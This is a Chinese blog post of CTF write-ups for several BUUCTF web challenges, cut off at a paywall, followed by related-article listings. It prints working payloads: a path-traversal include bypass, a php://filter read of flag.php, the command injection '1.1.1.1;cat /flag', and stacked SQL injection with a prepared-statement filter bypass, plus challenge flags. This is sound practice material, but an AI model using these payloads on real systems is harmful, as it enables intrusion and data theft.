BUUCTF Web1

已于 2022-12-11 19:56:29 修改
阅读量863 收藏 1
点赞数
分类专栏: CTF 文章标签: CTF web
于 2022-12-11 19:55:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ookami6497/article/details/127995179
版权

[极客大挑战 2019]EasySQL

试了个万能密码就能上去了

在这里插入图片描述

flag: flag{8e685472-02e4-440a-b04e-b0d9b6d9c27f}

[HCTF 2018]WarmUp

看源码有个source.php

 <?php
    highlight_file(__FILE__);
    class emmm
    {
   
        public static function checkFile(&$page)
        {
   
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
   
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
   
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
   
                return true;
            }

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
   
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
   
        include $_REQUEST['file'];
        exit;
    } else {
   
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?>

还有个hint.php

在这里插入图片描述

在include包含路径中,可以随便输入一个字符串,然后再输入一个…/就可以抵消,否则就会报错不存在此路径,这里多个…/就是不断的返回上一级目录查找ffffllllaaaagggg,最后返回flag。

payload

?file=source.php?/../../../../ffffllllaaaagggg

在这里插入图片描述

flag: flag{b807036f-4428-498f-bf2b-5991650c54f4}

[极客大挑战 2019]Havefun

看源码有一段这个

在这里插入图片描述

cat传参

在这里插入图片描述

flag: ==
flag{4f7dee31-4681-471d-8a7a-67f9a352c9a0} ==

[ACTF2020 新生赛]Include

过滤了input,但是filter没有过滤

在这里插入图片描述

尝试使用filter读取flag.php

?file=php://filter/read=convert.base64-encode/resource=flag.php

在这里插入图片描述

解码得到flag

在这里插入图片描述

flag: flag{65c1d0ba-f4a5-40d8-bccf-b5133958500f}

[ACTF2020 新生赛]Exec

exec可以执行命令,加个分号(;) 就行

在这里插入图片描述

payload

1.1.1.1;cat /flag

在这里插入图片描述

flag: flag{b6ecdddd-175a-4384-8822-505e74818172}

[强网杯 2019]随便注

试了下,发现过滤了select

?inject=3 union select 1,database()

在这里插入图片描述

可以使用堆叠注入,可以参考这个mysql常用命令

?inject=-1';show databases; -- '

爆出数据库

在这里插入图片描述

看当前数据库的数据表,这个表有点臭。。

?inject=-1';show tables; #

在这里插入图片描述

显示表的结构,看到有个flag

?inject=-1';DESCRIBE `1919810931114514`; #

在这里插入图片描述

嫖了下大佬的wp,可以用预处理语句绕过过滤

预处理语句使用方式

SET @sql = variable;  //设置变量
PREPARE yuchuli from '[my sql sequece]';   //预定义SQL语句
EXECUTE yuchuli;  //执行预定义SQL语句sqla

select * from 1919810931114514 定义为yuchuli

PREPARE yuchuli from 'select * from `1919810931114514`';
EXECUTE yuchuli;

select是被过滤的,所以用concat进行编码绕过

SET @sql = concat(char(115,101,108,101,99,116
最低0.47元/天 解锁文章
ofo300
关注
专栏目录
BUUCTFweb方向目(一)
wanan的博客
10-06 378
BUUCTFweb方向目(一)
BUUCTFWeb
xuanyulevel6的博客
08-08 4973
BUUCTFWeb
BUUCTF--web(1)
2302_79119987的博客
04-25 780
发现现在身份验证和密码都是对的,可以开始支付了目中说:Flag need your 100000000 money,尝试上传money,显示上传数字过长,想到了可以用科学计数法绕过,e表示10,e后面的数字表示次方,100000000表示为1e8,尝试输入money=1e8后提示money不够。它接受一个路径作为参数,并返回一个包含指定目录中所有文件和文件夹的数组。无论是PHP弱比较还是强比较,md5()函数无法处理数组,如果传入的是数组,会返回NULL,两个数组经过加密后返回值均为NULL,形成相等。
BUUCTFWeb方法总结(一)
Y1seco的博客
03-28 5075
文章目录1.堆叠注入,原理2.SQL缺省代码审计SQL注入 1.堆叠注入,原理 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而union injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语句。例如以下这个例子。用户输入:1; DELETE FRO
BUUCTF中**web**总结合集(正在更新中)
m0_64169451的博客
05-04 1004
buuctfweb练习总结
buuctf-[SWPU2019]Web1(小宇特详解)
小宇的web博客
02-26 1525
buuctf-[SWPU2019]Web1(小宇特详解) 1.先看目 2.这里我怀疑是sql注入,尝试了万能密码和sqlmap都没有效果 3.这里发现了有一个注册登录的地方 这里自己注册一个,不要注册admin,不要问我怎么知道的。 这里进去之后是一个广告信息管理 这里使用1’ order by 1# 来测试一下 显示标有敏感词汇 这里没有源码只能去手动的测试他过滤了啥 最终我发现了她过滤了or # --+和空格 这里想一下绕过的方法 空格可以用/**/来代替 –+注释符的话就用单引号闭合就o
BUUCTF部分web
最新发布
05-06
记录
BUUCTFweb之强网杯2019随便注
12-14
1’ : 报错 1’ #:回显正常 1’ order by 1 #: 正常(经测试列数为2–此处小白暗自窃喜) 1’ union select 1,2#: 回显 如图 看来此方法是行不通了,但经过苦苦寻求,了解到了堆叠注入: 库:1’;show databases;# ...
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
变量覆盖漏洞 自定义的参数值替换原有变量值的情况称为变量覆盖漏洞 经常导致变量覆盖漏洞场景有:$使用不当,extract()函数使用不当,parse_str()函数使用不当,import_request_variables()使用不当,开启了全局...
BUUCTF逆向前八
01-24
内容为BUUCTF里reserve的前八自己的一些解思路
1ncrd#Study-Record#BUUCTF[第二章 web进阶]XSS闯关1.md
08-10
一些关于xss的payload
2016 SWPU CTF web1目源码
10-31
2016 SWPU CTF web1目源码
buuctf web1
qq_61768489的博客
03-11 2894
[极客大挑战 2019]EasySQL [HCTF 2018]WarmUp <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"]; ...
web-ctfctf_BUUCTF_web(1)
一个努力生活的人的博客
11-20 1846
ctf_BUUCTF_web
网鼎杯-phpweb
szgyunyun的博客
05-25 328
找了一些php读取文件的函数尝试读取源码,试了一个readfile就成功了 <?php $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_
BUUCTFWEB-WarmUp
迷风小白
06-25 1万+
拿到目,一个表情包,顺便扫一下目录
BUUCTF平台web writeup
a370793934的专栏
11-28 1455
[HCTF 2018]WarmUp 首先f12查看源码,发现一个hint: 于是访问source.php,得到审计的源代码: <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) /* ...
BUUCTF第一笔记
热门推荐
Y4tacker的博客
06-20 1万+
关于变量前加& <?php $a =& $b ?> 这意味着 $a 和 $b 指向了同一个变量。 注: $a 和 $b 在这里是完全相同的,这并不是 $a 指向了 $b 或者相反,而是 $a 和 $b 指向了同一个地方。 目解析 首先我们在页面中发现了关键部分 拼接/source.php后得到一串php脚本代码 <?php highlight_file(__FILE__); class emmm { public static
BUUCTF: [SWPU2019]Web1
末初的CSDN博客
09-25 671
登录注册、在测试的时候发现发布中的广告名如果输入一些敏感关键字,例如。但是因为没有字段信息可以查,使用无列名注入直接查内容。然后再之后的对广告名的fuzz测试中发现以下过滤。猜测广告名存在注入,尝试在广告名处输入单引号。,发布的时候并没有任何反应,发布后有个。尝试联合查询、首先需要判断有多少字段,直接报错了,基本确定广告名存在。无法注释就尝试构造闭合。可以查看发布的广告。查表明,因为这里过滤。
buuctf web
08-15
- *1* [【CTFbuuctf web 详解(持续更新)](https://blog.csdn.net/m0_52923241/article/details/119641325)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ofo300

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值